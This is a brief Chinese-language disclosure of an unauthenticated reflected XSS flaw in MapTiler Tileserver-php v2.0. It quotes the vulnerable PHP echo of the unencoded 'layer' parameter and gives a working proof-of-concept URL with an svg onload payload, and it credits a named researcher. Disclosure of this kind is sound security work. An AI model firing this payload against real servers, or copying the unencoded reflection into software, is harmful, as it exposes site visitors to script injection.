MapTiler Tileserver-php v2.0 中的未认证 XSS 漏洞
MapTiler Tileserver-php v2.0 存在跨站脚本(XSS)漏洞。GET 参数 "layer" 在错误消息中直接反射,未进行 HTML 编码。这导致 XSS,允许未经认证的攻击者在受害者浏览器上执行任意 HTML 或 JavaScript 代码。
echo 'Server: Unknown or not specified dataset "' . $tileset . '"';
http://host/tileserver.php/wmts/x/1/1/asd?Request=x&layer=%3csvg+onload=alert(document.domain)%3e
Martin Herancourt